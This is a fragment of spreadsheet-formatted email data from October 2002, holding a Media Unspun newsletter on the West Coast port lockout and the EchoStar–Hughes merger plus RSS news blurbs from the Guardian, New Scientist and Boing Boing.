    <t>To: zzzz-unspun@spamassassin.taint.org\nFrom: "Media Unspun" &lt;guterman@mediaunspun.imakenews.net&gt;\nDate: Tue, 08 Oct 2002 09:21:18 -0400</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 09:21:18 -0400</t>
  </si>
  <si>
    <t>zzzz-unspun@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Bush Covers the Waterfront</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format... ------------=_1034083278-26594-4 Content-Type: text/plain; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit To view this newsletter in full-color: [URL]http://newsletter.mediaunspun.com[/URL] Media Unspun What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] ----------------------------------------------------------------- October 8, 2002 ----------------------------------------------------------------- IN THIS ISSUE ----------------------------------------------------------------- * BUSH COVERS THE WATERFRONT * THE BIGGEST CABLE HOOKUP ----------------------------------------------------------------- EDITOR'S NOTE ----------------------------------------------------------------- Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more  successful we are, the more useful we can be to you. Pass it on!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 ADVERTISEMENT ----------------------------------------------------------------- Pop!Tech 2002 October 18 - 20, 2002: Camden, Maine Join 500 big thinkers to discuss the collision of technology and culture Register now at: [URL]http://www.poptech.org[/URL] ----------------------------------------------------------------- BUSH COVERS THE WATERFRONT ----------------------------------------------------------------- It may seem like all Iraq, all the time in the Oval Office, but the president has at least one other thing on his mind this week: that pesky port lockout. The freight still isn't moving, factories are running out of parts, produce is rotting, and retailers are more freaked about Christmas with every passing day.  On Monday, Bush stepped in and appointed a three-member panel to  see how badly this shutdown is hosing the economy. (We hope this  isn't a difficult question, as the panel's been given all of one  day to report back.) When Bush gets the report on Tuesday, the next step might be a court order to reopen the ports under the 1947 Taft-Hartley Act. That would send employees back to work for 80 days while federal mediators duke it out over the disputed contract and retailers lower their Xanax dosages. Invoking Taft-Hartley requires a threat to national health or safety -- not the economy. But Labor Secretary Elaine Chao covered that base in a statement on Monday, saying the work stoppage threatens the flow of supplies to the military (we knew  Iraq would be in here somewhere). "Union officials quickly responded that their members have been unloading military cargo throughout the 10-day shutdown," said the L.A. Times, but an anonymous Bush administration official "said that only a portion  of what the Defense Department needs has made it ashore." Politically, this has been a tricky one. Using Taft-Hartley would annoy labor right before congressional elections. On the other hand, "Voter discontent with Bush's handling of the increasingly fragile economic recovery has begun showing up in polls, and such concerns may have outweighed the political danger to the Republican administration," said the San Francisco  Chronicle. Also, Bush stepped in on the same day that a poll reported two-thirds of Americans wanted him to focus more on the  economy. "Though the administration promised an unbiased examination of the lockout, Bush appeared to have made up his mind that it was hurting national security and the economy, andmerited federal intervention," said the AP.  As for Taft-Hartley, it's not exactly famous for solving labor disputes. Often the 80-day cooling-off period ends, and workers simply walk out again (or get locked out again, in this case). One gets the sense, however, that fixing the dockworkers' contract isn't the point of this particular 80 days. It's 78 days until Christmas. The race is on. - Jen Muehlbauer President Acts To Halt Port Lockout for 80 Days (Seattle Times) [URL]http://tinyurl.com[/URL] Bush Expected To Act on Ports Crisis  [URL]http://www.accessatlanta.com[/URL] President Moves Toward Forcing the Reopening of West Coast Ports [URL]http://www.latimes.com[/URL],0,1021983.story Bush Takes Step Toward Halting Lockout After West Coast Port Talks Break Off (AP) [URL]http://tinyurl.com[/URL] White House Intervenes on Docks Dispute (Financial Times) [URL]http://tinyurl.com[/URL] Cooling-off Period Likely in Port Fight (SF Chronicle) [URL]http://tinyurl.com[/URL] Bush Moves Toward Halting Port Shutdown [URL]http://www.nytimes.com[/URL] Trouble On The Docks [URL]http://online.wsj.com[/URL],,2_0864,00.html (Paid subscription required.) Charges of Politics Have Dogged Taft-Hartley Act [URL]http://seattlepi.nwsource.com[/URL] Taft-Hartley Act No Quick-Fix For Port Dispute (Reuters) [URL]http://www.forbes.com[/URL] ----------------------------------------------------------------- ADVERTISEMENT ----------------------------------------------------------------- SPECIAL OFFER!   Save 24% on a subscription to MIT TECHNOLOGY REVIEW. Get an inside view into the technologies, deals, and companies emerging from one of the leading research institutes -- MIT.  [URL]http://www.technologyinsider.com[/URL]  ----------------------------------------------------------------- THE BIGGEST CABLE HOOKUP ----------------------------------------------------------------- wo birds want to join forces and the FCC is about to cry "fowl."  We mean "foul." The two dominant direct broadcast satellite players want to join forces, the better to compete with Big Cable. Federal regulators, both the FCC and the Justice Department, are concerned that the resulting conglomerate of DirecTV with Dish Network would command roughly 95% of satellite  service in the US. The press could not settle on a price tag for the proposed merger between EchoStar Communications and Hughes Electronics --  it was described as being worth anywhere from $15 billion and $25 billion. It was a challenge to keep the players straight, as  some outlets talked of a merger between the corporate parents, and others referred to the service monikers. Hughes is DirecTV and EchoStar is Dish. All straight? The two companies sent a letter to the FCC urging them to hold off ruling on (read, rejecting) the merger until the Justice Department has spoken. EchoStar and Hughes offered unspecified "major revisions" to the deal that they want to discuss with Justice in the next weeks. The Wall Street Journal delved deeply into the form those revisions could take -- specifically, selling some frequencies to Cablevision. The Journal reported that Cablevision has wanted  to get into the satellite business for 10 years and outlined the  cable company's plans and past spending on such a project. TheStreet.com turned in an extensive analysis of the deal for investors in the satellite space. It seems the market for expanded-service television may be nearing saturation. TheStreet.com quoted an analyst's report which concluded, "Consumers should benefit from ... continued rivalry, but shareholders may realize much smaller returns." The New York Times and the Journal both mentioned Rupert Murdoch  waiting in the wings. Last year Murdoch's News Corp. bid for DirecTV, but lost out at the last minute to EchoStar. If the current deal falls through, he'll be back. - Keith Dawson EchoStar and Hughes Propose Concessions in Bid to Save Deal [URL]http://online.wsj.com[/URL],,SB103403314258094560,00.html (Paid subscription required) Regulators Set to Block EchoStar's Hughes Purchase [URL]http://online.wsj.com[/URL],,SB1033939901346228393,00.html (Paid subscription required) 'Last-ditch effort' (Rocky Mountain News) [URL]http://tinyurl.com[/URL] EchoStar, Hughes See a Glimmer of Hope [URL]http://www.thestreet.com[/URL] F.C.C. Asked to Put Off Merger Ruling [URL]http://www.nytimes.com[/URL] EchoStar, Hughes ask FCC to defer decision [URL]http://www.nypost.com[/URL] EchoStar, Hughes offer merger changes (Reuters)  [URL]http://news.com.com[/URL] Delay in satellite-TV merger OK requested (AP) [URL]http://www.bayarea.com[/URL] EchoStar, Hughes Seek to Delay Ruling [URL]http://www.latimes.com[/URL],0,3454976.story EchoStar pleads to FCC on merger (Denver Post) [URL]http://tinyurl.com[/URL] ----------------------------------------------------------------- OTHER STORIES ----------------------------------------------------------------- SEC Probes AOL-Oxygen Pact For Double-Booking of Revenue [URL]http://online.wsj.com[/URL],,SB1033938113684731193,00.html (Paid subscription required.) Tivo Raises $25 Million in Stock Offering (AP) [URL]http://www.siliconvalley.com[/URL] WorldCom Officer Pleads Guilty to Fraud [URL]http://www.washingtonpost.com[/URL] Two Magazines Are Shut and a Third Revamps [URL]http://www.nytimes.com[/URL] Regulators Say They Have CSFB 'Smoking Gun' [URL]http://www.usatoday.com[/URL] Expected Cold Winter Could Increase Natural Gas Prices  [URL]http://www.accessatlanta.com[/URL] Frozen World Found Beyond Pluto [URL]http://www.msnbc.com[/URL] Fool Me Once [URL]http://www.nytimes.com[/URL] New Northwest System for Internet Bookings [URL]http://www.nytimes.com[/URL] The Fastest-Growing Tech Companies [URL]http://www.business2.com[/URL],,1-1,00.html Debating the Baby Bells [URL]http://www.nytimes.com[/URL] (Paid subscription required) Silicon Valley Is Yearning For User-Friendly Microsoft [URL]http://online.wsj.com[/URL],,SB1034036651300028760,00.html (Paid subscription required) ----------------------------------------------------------------- ----------------------------------------------------------------- Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com  today. ----------------------------------------------------------------- STAFF ----------------------------------------------------------------- Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.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________________ POWERED BY: [URL]http://www.imakenews.com[/URL] To be removed from this list, use this link: [URL]http://www.imakenews.com[/URL] To receive future messages in HTML format, use this link: [URL]http://www.imakenews.com[/URL] To change your subscriber information, use this link: [URL]http://www.imakenews.com[/URL] ------------=_1034083278-26594-4 Content-Type: text/html; charset="iso-8859-1" Content-Disposition: inline Content-Transfer-Encoding: 7bit      Media Unspun   Pass it on... 					 					What the Press is Reporting and Why ([URL]www.mediaunspun.com[/URL] 					 					 				 				 					 					 						 							Tuesday, October 8, 2002 						 					 					 					 				 Top Spins... 			 						 				 			 			Bush Covers the Waterfront 			 				 			 			 			 			 			 						 				 			 			The Biggest Cable Hookup 			 				 			 			 			 			 			 						 				 			 			Other Stories 			 				 			 			 			 			 			 			 			 			 			 			Editor's Note 			 			 			 Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!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Sponsor Pop!Tech 2002 October 18 - 20, 2002: Camden, Maine Join 500 big thinkers to discuss the collision of technology and culture Register now at: [URL]http://www.poptech.org[/URL]  			 			 			 			 			 			Bush Covers the Waterfront 			 			 			 It may seem like all Iraq, all the time in the Oval Office, but the president has at least one other thing on his mind this week: that pesky port lockout. The freight still isn't moving, factories are running out of parts, produce is rotting, and retailers are more freaked about Christmas with every passing day.  On Monday, Bush stepped in and appointed a three-member panel to see how badly this shutdown is hosing the economy. (We hope this isn't a difficult question, as the panel's been given all of one day to report back.) When Bush gets the report on Tuesday, the next step might be a court order to reopen the ports under the 1947 Taft-Hartley Act. That would send employees back to work for 80 days while federal mediators duke it out over the disputed contract and retailers lower their Xanax dosages. Invoking Taft-Hartley requires a threat to national health or safety -- not the economy. But Labor Secretary Elaine Chao covered that base in a statement on Monday, saying the work stoppage threatens the flow of supplies to the military (we knew Iraq would be in here somewhere). "Union officials quickly responded that their members have been unloading military cargo throughout the 10-day shutdown," said the L.A. Times, but an anonymous Bush administration official "said that only a portion of what the Defense Department needs has made it ashore." Politically, this has been a tricky one. Using Taft-Hartley would annoy labor right before congressional elections. On the other hand, "Voter discontent with Bush's handling of the increasingly fragile economic recovery has begun showing up in polls, and such concerns may have outweighed the political danger to the Republican administration," said the San Francisco Chronicle. Also, Bush stepped in on the same day that a poll reported two-thirds of Americans wanted him to focus more on the economy. "Though the administration promised an unbiased examination of the lockout, Bush appeared to have made up his mind that it was hurting national security and the economy, andmerited federal intervention," said the AP.  As for Taft-Hartley, it's not exactly famous for solving labor disputes. Often the 80-day cooling-off period ends, and workers simply walk out again (or get locked out again, in this case). One gets the sense, however, that fixing the dockworkers' contract isn't the point of this particular 80 days. It's 78 days until Christmas. The race is on. - Jen Muehlbauer President Acts To Halt Port Lockout for 80 Days (Seattle Times) [URL]http://tinyurl.com[/URL]  Bush Expected To Act on Ports Crisis  [URL]http://www.accessatlanta.com[/URL]  President Moves Toward Forcing the Reopening of West Coast Ports [URL]http://www.latimes.com[/URL],0,1021983.story  Bush Takes Step Toward Halting Lockout After West Coast Port Talks Break Off (AP) [URL]http://tinyurl.com[/URL]  White House Intervenes on Docks Dispute (Financial Times) [URL]http://tinyurl.com[/URL]  Cooling-off Period Likely in Port Fight (SF Chronicle) [URL]http://tinyurl.com[/URL]  Bush Moves Toward Halting Port Shutdown [URL]http://www.nytimes.com[/URL]  Trouble On The Docks [URL]http://online.wsj.com[/URL],,2_0864,00.html  (Paid subscription required.) Charges of Politics Have Dogged Taft-Hartley Act [URL]http://seattlepi.nwsource.com[/URL]  Taft-Hartley Act No Quick-Fix For Port Dispute (Reuters) [URL]http://www.forbes.com[/URL]  Sponsor SPECIAL OFFER!   Save 24% on a subscription to MIT TECHNOLOGY REVIEW. Get an inside view into the technologies, deals, and companies emerging from one of the leading research institutes -- MIT.  [URL]http://www.technologyinsider.com[/URL]  			 			 			 			 			 			The Biggest Cable Hookup 			 			 			 wo birds want to join forces and the FCC is about to cry "fowl." We mean "foul." The two dominant direct broadcast satellite players want to join forces, the better to compete with Big Cable. Federal regulators, both the FCC and the Justice Department, are concerned that the resulting conglomerate of DirecTV with Dish Network would command roughly 95% of satellite service in the US. The press could not settle on a price tag for the proposed merger between EchoStar Communications and Hughes Electronics -- it was described as being worth anywhere from $15 billion and $25 billion. It was a challenge to keep the players straight, as some outlets talked of a merger between the corporate parents, and others referred to the service monikers. Hughes is DirecTV and EchoStar is Dish. All straight? The two companies sent a letter to the FCC urging them to hold off ruling on (read, rejecting) the merger until the Justice Department has spoken. EchoStar and Hughes offered unspecified "major revisions" to the deal that they want to discuss with Justice in the next weeks. The Wall Street Journal delved deeply into the form those revisions could take -- specifically, selling some frequencies to Cablevision. The Journal reported that Cablevision has wanted to get into the satellite business for 10 years and outlined the cable company's plans and past spending on such a project. TheStreet.com turned in an extensive analysis of the deal for investors in the satellite space. It seems the market for expanded-service television may be nearing saturation. TheStreet.com quoted an analyst's report which concluded, "Consumers should benefit from ... continued rivalry, but shareholders may realize much smaller returns." The New York Times and the Journal both mentioned Rupert Murdoch waiting in the wings. Last year Murdoch's News Corp. bid for DirecTV, but lost out at the last minute to EchoStar. If the current deal falls through, he'll be back. - Keith Dawson EchoStar and Hughes Propose Concessions in Bid to Save Deal [URL]http://online.wsj.com[/URL],,SB103403314258094560,00.html  (Paid subscription required) Regulators Set to Block EchoStar's Hughes Purchase [URL]http://online.wsj.com[/URL],,SB1033939901346228393,00.html  (Paid subscription required) 'Last-ditch effort' (Rocky Mountain News) [URL]http://tinyurl.com[/URL]  EchoStar, Hughes See a Glimmer of Hope [URL]http://www.thestreet.com[/URL]  F.C.C. Asked to Put Off Merger Ruling [URL]http://www.nytimes.com[/URL]  EchoStar, Hughes ask FCC to defer decision [URL]http://www.nypost.com[/URL]  EchoStar, Hughes offer merger changes (Reuters)  [URL]http://news.com.com[/URL]  Delay in satellite-TV merger OK requested (AP) [URL]http://www.bayarea.com[/URL]  EchoStar, Hughes Seek to Delay Ruling [URL]http://www.latimes.com[/URL],0,3454976.story  EchoStar pleads to FCC on merger (Denver Post) [URL]http://tinyurl.com[/URL]  			 			 			 			 			 			Other Stories 			 			 			 SEC Probes AOL-Oxygen Pact For Double-Booking of Revenue [URL]http://online.wsj.com[/URL],,SB1033938113684731193,00.html  (Paid subscription required.) Tivo Raises $25 Million in Stock Offering (AP) [URL]http://www.siliconvalley.com[/URL]  WorldCom Officer Pleads Guilty to Fraud [URL]http://www.washingtonpost.com[/URL]  Two Magazines Are Shut and a Third Revamps [URL]http://www.nytimes.com[/URL]  Regulators Say They Have CSFB 'Smoking Gun' [URL]http://www.usatoday.com[/URL]  Expected Cold Winter Could Increase Natural Gas Prices  [URL]http://www.accessatlanta.com[/URL]  Frozen World Found Beyond Pluto [URL]http://www.msnbc.com[/URL]  Fool Me Once [URL]http://www.nytimes.com[/URL]  New Northwest System for Internet Bookings [URL]http://www.nytimes.com[/URL]  The Fastest-Growing Tech Companies [URL]http://www.business2.com[/URL],,1-1,00.html  Debating the Baby Bells [URL]http://www.nytimes.com[/URL]  (Paid subscription required) Silicon Valley Is Yearning For User-Friendly Microsoft [URL]http://online.wsj.com[/URL],,SB1034036651300028760,00.html  (Paid subscription required) Sponsor 			 				 					 					Do you want to reach the Net's savviest audience? Advertise in Media Unspun. Contact Erik Vanderkolk for details at erikvanderkolk@yahoo.com today. 					 					 			 			 			 			 			 			Staff 			 			 			 			 				 					 					Written by Deborah Asbrand (dasbrand@world.std.com), Keith Dawson (dawson@world.std.com), Jen Muehlbauer (jen@englishmajor.com), and Lori Patel (loripatel@hotmail.com). Copyedited by Jim Duffy (jimduffy86@yahoo.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Subscribe 		 	 Enter your email address in the box below to receive a free four-week trial of Media Unspun:  			 			Add 			 		 	 		 		 		Remove 		SendasHTML Â  	 	   Newsletter Services Provided by iMakeNews.com Advertisement Tell a Friend... Powered by iMakeNews.comâ„¢ This email was sent to: zzzz-unspun@spamassassin.taint.org (REMOVE) - to be instantly deleted from this list.(CHANGE FORMAT) - receive future messages in plain text format.(UPDATE) your subscriber information and preferences. Â  		    	            ------------=_1034083278-26594-4--</t>
  </si>
  <si>
    <t>http://newsletter.mediaunspun.com www.mediaunspun.com http://www.mediaunspun.com http://www.poptech.org http://tinyurl.com http://www.accessatlanta.com http://www.latimes.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://www.nytimes.com http://online.wsj.com http://seattlepi.nwsource.com http://www.forbes.com http://www.technologyinsider.com http://online.wsj.com http://online.wsj.com http://tinyurl.com http://www.thestreet.com http://www.nytimes.com http://www.nypost.com http://news.com.com http://www.bayarea.com http://www.latimes.com http://tinyurl.com http://online.wsj.com http://www.siliconvalley.com http://www.washingtonpost.com http://www.nytimes.com http://www.usatoday.com http://www.accessatlanta.com http://www.msnbc.com http://www.nytimes.com http://www.nytimes.com http://www.business2.com http://www.nytimes.com http://online.wsj.com http://www.mediaunspun.com http://newsletter.mediaunspun.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com http://www.imakenews.com www.mediaunspun.com http://www.mediaunspun.com http://www.poptech.org http://tinyurl.com http://www.accessatlanta.com http://www.latimes.com http://tinyurl.com http://tinyurl.com http://tinyurl.com http://www.nytimes.com http://online.wsj.com http://seattlepi.nwsource.com http://www.forbes.com http://www.technologyinsider.com http://online.wsj.com http://online.wsj.com http://tinyurl.com http://www.thestreet.com http://www.nytimes.com http://www.nypost.com http://news.com.com http://www.bayarea.com http://www.latimes.com http://tinyurl.com http://online.wsj.com http://www.siliconvalley.com http://www.washingtonpost.com http://www.nytimes.com http://www.usatoday.com http://www.accessatlanta.com http://www.msnbc.com http://www.nytimes.com http://www.nytimes.com http://www.business2.com http://www.nytimes.com http://online.wsj.com http://www.mediaunspun.com http://newsletter.mediaunspun.com</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:22 -0000</t>
  </si>
  <si>
    <t>zzzz@spamassassin.taint.org</t>
  </si>
  <si>
    <t>Man leads machine in chess duel</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8643939,1440/\nDate: Not supplied\n\nWorld chess champion Vladimir Kramnik takes the lead over the computer Deep \nFritz, after the machine makes a peculiar mistake</t>
  </si>
  <si>
    <t>Geneticists and a tiny worm win Nobel prize</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8639022,1440/\nDate: Not supplied\n\nThe medicine prize goes to research that revealed how cell suicide sculpts the \nbody and - when disrupted - causes disease</t>
  </si>
  <si>
    <t>Human handshake opens data stream</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8639021,1440/\nDate: Not supplied\n\nA new Japanese system allows palmtop computers to swap large amounts of data \nwhen their owners shake hands</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:21 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:21 -0000</t>
  </si>
  <si>
    <t>Species at risk of extinction growing</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8653742,1440/\nDate: Not supplied\n\nThe latest "Red List" adds 124 to the 11,000 endangered species around the \nglobe - but also includes a stick insect revival</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:21 -0000</t>
  </si>
  <si>
    <t>New Solar System body revealed</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8640496,1440/\nDate: Not supplied\n\nThe largest object found since 1930 is half the size of Pluto, and calls that \nobject's planetary status into question</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:20 -0000</t>
  </si>
  <si>
    <t>A Watched Server Never Breaks</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-07T12:30:42-08:00\n\nFor the past week, I've been waiting for one of my FreeBSD servers to reproduce \na problem we've been seeing with MySQL + LinuxThreads. This particular machine \nis running a custom build of MySQL 4.0.4 (or MySQL 404, as I...</t>
  </si>
  <si>
    <t>MySQL 4.1 Source Tree Available</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-07T14:07:06-08:00\n\nIf you like to live on the bleeding edge and play with code that's not yet \nready for prime-time, good news! You can now get the MySQL 4.1 source tree. The \nonly real difference from the 3.23 and 4.0 trees...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:07 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:07 -0000</t>
  </si>
  <si>
    <t>Seeing is believing</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655716,215/\nDate: 2002-10-08T03:30:50+01:00\n\n*Feature: *She has loved clothes with a passion all her life. And yet acclaimed \nauthor *Linda Grant* has never been to the collections - until now. So what \ndoes she make of the Paris shows?</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Nobel prize for British and US scientists</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655712,215/\nDate: 2002-10-08T03:30:54+01:00\n\n*Medicine and health: *The discovery of the myriad little deaths which lead to \nlife brought the most coveted prize in world medicine to two Britons and an \nAmerican yesterday.</t>
  </si>
  <si>
    <t>Factories go flat while we dither over the euro</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655714,215/\nDate: 2002-10-08T03:30:52+01:00\n\n*Business: *The long-awaited recovery in Britain's manufacturing sector ground \nto a halt in August, despite a sharp rise in car production, official figures \nshowed yesterday.</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:06 -0000</t>
  </si>
  <si>
    <t>Dawn raids stoke fires of resentment</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655713,215/\nDate: 2002-10-08T03:30:53+01:00\n\n*Afghanistan: *In his final report one year from the beginning of the US \ncampaign *Rory McCarthy* finds mounting anger at the military presence.</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>10 die as Israeli helicopter fires on Palestinian crowd</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655710,215/\nDate: 2002-10-08T03:30:56+01:00\n\n*World latest: *Hundreds of Palestinians vent their anger as dozens of Israeli \ntanks withdrew after a gruelling three-hour raid on the Gaza strip.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:05 -0000</t>
  </si>
  <si>
    <t>'Nasty party' warning to Tories</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655708,215/\nDate: 2002-10-08T03:30:58+01:00\n\n*Politics: *The Conservative leadership yesterday launched itself into a frenzy \nof self-reproach as it struggled to shed the image of Britain's "nasty party".</t>
  </si>
  <si>
    <t>Boy shot at school gate</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655711,215/\nDate: 2002-10-08T03:30:55+01:00\n\n*Gun violence in America: *A 13-year-old boy was shot in the chest and \ncritically wounded outside of his school in Maryland becoming the latest victim \nof a sniper who has already killed six people.</t>
  </si>
  <si>
    <t>Support for Iraq action at new low of 32%</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655709,215/\nDate: 2002-10-08T03:30:57+01:00\n\n*UK latest: *Support for military action against Iraq among British voters has \nfallen to 32%, the lowest level recorded while the Guardian/ICM survey has been \nrunning.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:04 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:01:04 -0000</t>
  </si>
  <si>
    <t>'I'm just an idiot'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655707,215/\nDate: 2002-10-08T03:30:59+01:00\n\n*Simon Hattenstone* meets comedian Lee Evans.</t>
  </si>
  <si>
    <t>To: zzzz@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:01:04 -0000</t>
  </si>
  <si>
    <t>Police pay damages to journalist</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655706,215/\nDate: 2002-10-08T03:31:00+01:00\n\nBBC reporter Donal MacIntyre wins high profile libel case against police.</t>
  </si>
  <si>
    <t>Hopes fade in Ulster crisis talks</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8655705,215/\nDate: 2002-10-08T03:31:01+01:00\n\nTony Blair to hold crisis summit with Ulster Unionist leader David Trimble in \nDowning Street today.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: joelonsoftware &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:44 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:44 -0000</t>
  </si>
  <si>
    <t>Delphi Questions, a new _Joel on Software_ discussion group.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.joelonsoftware.com[/URL]\nDate: Not supplied\n\nDelphi Questions[1], a new _Joel on Software_ discussion group.\n\n\n\n[1] [URL]http://discuss.fogcreek.com[/URL]</t>
  </si>
  <si>
    <t>http://www.joelonsoftware.com http://discuss.fogcreek.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:33 -0000</t>
  </si>
  <si>
    <t>Indie artist hits top-ten by engaging audience</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nFeorag writes from Scotland: "You probably haven't heard of John Otway, but he \nhas a small and devoted following here. He did a limited issue CD and asked his \nfans to vote on which track _they'd_ like to see as a single. The one they \npicked just entered the UK charts at number 9! Bet that'll piss off the major \nrecord labels, especially as the marketing budget was probably about zero. I \nmight just watch Top of the Pops this week." Link[1] Discuss[2] (_Thanks, \nFeorag[3]!_)\n\n[1] [URL]http://news.bbc.co.uk[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.antipope.org[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:32 -0000</t>
  </si>
  <si>
    <t>10Mb/s through skin</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nNTT DoCoMo have released a paper on the use of human flesh as a networking \nmedium: \n\n    A device attached to a PDA can send and receive weak electrical signals \n    through people, with human bodies as communications circuits, the paper \n    said, citing sources close to the companies. \n\n    Apparel and handbags have their own conductivity, allowing an electrical \n    connection to a PDA that can remain in one's pocket, the paper said. \n\n    In this way, people can exchange e-mail addresses, names and phone numbers \n    while shaking hands, with the data automatically written into both their \n    PDAs, the paper said.  \n\nLink[1] Discuss[2] (_Thanks, Alan!_)\n\n[1] [URL]http://www.news.com.au[/URL],4057,5239758%255E13762,00.html\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.news.com.au http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 08 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>Tue, 08 Oct 2002 08:00:31 -0000</t>
  </si>
  <si>
    <t>A&amp;L Daily to be auctioned in bankruptcy</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nArts and Letters Daily, a wonderful and dense blog, has folded up its tent due \nto the bankruptcy of its parent company. A&amp;L Daily will be auctioned off by the \nreceivers. Link[1] Discuss[2] (_Thanks, Misha!_)\n\n[1] [URL]http://www.aldaily.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.aldaily.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Toy otaku heaven</t>
  </si>
  <si>
